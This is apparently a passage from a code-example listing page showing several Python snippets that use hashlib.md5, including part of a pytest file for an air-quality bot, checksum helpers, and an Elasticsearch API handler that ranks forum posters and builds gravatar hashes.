    r"\* PM2\.5: \d+(?:\.\d+)? \(최소 \d+(?:\.\d+)? / 최대 \d+(?:\.\d+)?\)\n"
    r"\* PM10: \d+(?:\.\d+)? \(최소 \d+(?:\.\d+)? / 최대 \d+(?:\.\d+)?\)\n"
    r"\* 오존: \d+(?:\.\d+)? \(최소 \d+(?:\.\d+)? / 최대 \d+(?:\.\d+)?\)\n"
    r"\* 이산화 질소: \d+(?:\.\d+)? \(최소 \d+(?:\.\d+)? / 최대 \d+(?:\.\d+)?\)\n"
    r"\* 이산화 황: \d+(?:\.\d+)? \(최소 \d+(?:\.\d+)? / 최대 \d+(?:\.\d+)?\)\n"
    r"\* 일산화 탄소: \d+(?:\.\d+)? \(최소 \d+(?:\.\d+)? / 최대 \d+(?:\.\d+)?\)")

addr1 = "부천"
addr1_md5 = md5(addr1.encode()).hexdigest()
addr2 = "서울"
addr2_md5 = md5(addr2.encode()).hexdigest()


@pytest.fixture(scope="module")
def event_loop():
    loop = asyncio.new_event_loop()
    yield loop
    loop.close()


@pytest.fixture()
def aqi_api_token():
    token = os.getenv("AQI_API_TOKEN")
    if not token:
Пример #56
0
from hashlib import md5

def calc_hexdigest(s):
    """Return md5 digest for a string."""
    s = compat.to_bytes(s)  # ``compat`` comes from the surrounding package
    return md5(s).hexdigest()  # returns a native string
Пример #57
0
import hashlib

def md5sum(fn):
    md5 = hashlib.md5()
    with open(fn, 'rb') as f:
        for chunk in iter(lambda: f.read(8192), b""):
            md5.update(chunk)
    return md5.hexdigest()
Пример #58
0
import hashlib

def ErrorHash(self):
    # Instance method; self._suppression must be bytes under Python 3.
    return int(hashlib.md5(self._suppression).hexdigest()[:16], 16)
Пример #59
0
import hashlib

def md5(text):
    return hashlib.md5(text.encode('utf-8')).hexdigest()
Пример #60
0
import time
import hashlib
import json

def run(API, environ, indata, session):

    # We need to be logged in for this!
    if not session.user:
        raise API.exception(403, "You must be logged in to use this API endpoint!")

    now = time.time()

    # First, fetch the view if we have such a thing enabled
    viewList = []
    if indata.get("view"):
        viewList = session.getView(indata.get("view"))
    if indata.get("subfilter"):
        viewList = session.subFilter(indata.get("subfilter"), view=viewList)

    dateTo = indata.get("to", int(time.time()))
    dateFrom = indata.get(
        "from", dateTo - (86400 * 30 * 6)
    )  # Default to a 6 month span

    interval = indata.get("interval", "month")
    xtitle = None

    ####################################################################
    ####################################################################
    dOrg = session.user["defaultOrganisation"] or "apache"
    query = {
        "query": {
            "bool": {
                "must": [
                    {"range": {"created": {"from": dateFrom, "to": dateTo}}},
                    {"term": {"organisation": dOrg}},
                ]
            }
        }
    }
    # Source-specific or view-specific??
    if indata.get("source"):
        query["query"]["bool"]["must"].append(
            {"term": {"sourceID": indata.get("source")}}
        )
    elif viewList:
        query["query"]["bool"]["must"].append({"terms": {"sourceID": viewList}})
    if indata.get("email"):
        query["query"]["bool"]["must"].append(
            {"term": {"creator": indata.get("email")}}
        )
        xTitle = "People closing %s's issues" % indata.get("email")

    # Get top 25 committers this period
    query["aggs"] = {
        "committers": {"terms": {"field": "creator", "size": 25}, "aggs": {}}
    }
    res = session.DB.ES.search(
        index=session.DB.dbname, doc_type="forum_post", size=0, body=query
    )

    people = {}
    for bucket in res["aggregations"]["committers"]["buckets"]:
        email = bucket["key"]
        count = bucket["doc_count"]
        sha = email
        if session.DB.ES.exists(index=session.DB.dbname, doc_type="person", id=sha):
            pres = session.DB.ES.get(
                index=session.DB.dbname, doc_type="person", id=email
            )
            person = pres["_source"]
            person["name"] = person.get("name", "unknown")
            people[email] = person
            people[email]["gravatar"] = hashlib.md5(
                person.get("email", "unknown").encode("utf-8")
            ).hexdigest()
            people[email]["count"] = count

    topN = []
    for email, person in people.items():
        topN.append(person)
    topN = sorted(topN, key=lambda x: x["count"], reverse=True)
    JSON_OUT = {
        "topN": {"denoter": "replies posted", "items": topN},
        "okay": True,
        "responseTime": time.time() - now,
        "widgetType": {"chartType": "bar", "title": xtitle},
    }
    yield json.dumps(JSON_OUT)
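For orientation, the terms aggregation returns buckets shaped roughly like this (values invented); this is the fragment the loop over res["aggregations"]["committers"]["buckets"] consumes:

res = {
    "aggregations": {
        "committers": {
            "buckets": [
                {"key": "dev@example.org", "doc_count": 42},
                {"key": "other@example.org", "doc_count": 17},
            ]
        }
    }
}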